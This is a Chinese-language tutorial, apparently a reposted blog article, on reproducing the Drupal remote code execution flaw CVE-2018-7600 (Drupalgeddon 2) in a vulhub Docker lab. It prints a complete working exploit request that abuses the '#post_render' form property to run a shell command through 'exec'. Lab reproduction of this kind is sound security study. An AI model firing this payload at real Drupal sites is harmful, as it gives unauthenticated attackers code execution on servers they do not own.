如何进行Drupal 远程代码执行漏洞CVE-2018-7600的复现

发布时间:2021-12-29 17:52:48 作者:柒染
来源:亿速云 阅读:417

这期内容当中小编将会给大家带来有关如何进行Drupal 远程代码执行漏洞CVE-2018-7600的复现,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由由内容管理系统和PHP开发框架共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。

2018年3月28日,Drupal Security Team官方发布公告称Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用该漏洞执行恶意代码。

Drupal未对表单请求数据做严格过滤,导致攻击者可以将恶意代码注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。

影响范围: Drupal 6,7,8等多个子版本

下面仅作漏洞复现记录与实现,利用流程如下:

一、漏洞环境

本次演示环境采用vulhub搭建,执行以下命令搭建

cd /drupal/CVE-2018-7600/

docker-compose up -d

语言选择英文,中文安装可能会报错,数据库选择sqlite数据库,然后其他都默认就可以了

如何进行Drupal 远程代码执行漏洞CVE-2018-7600的复现

漏洞链接: http://192.168.101.152:8080/

访问之后是这个样子的

如何进行Drupal 远程代码执行漏洞CVE-2018-7600的复现

二、漏洞利用

直接发送以下数据包就可以执行命令了

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 192.168.101.152:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

如何进行Drupal 远程代码执行漏洞CVE-2018-7600的复现

命令执行成功

上述就是小编为大家分享的如何进行Drupal 远程代码执行漏洞CVE-2018-7600的复现了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注亿速云行业资讯频道。

推荐阅读:
  1. Drupal 远程代码执行漏洞(CVE-2018-7602)
  2. Drupal Drupalgeddon 2远程执行代码漏洞(

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

drupal cve-2018-7600

上一篇:如何解决使用Hybris Commerce User API读取用户信息时电话字段没有返回问题

下一篇:Windows任意文件读取0 day漏洞怎么防护

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》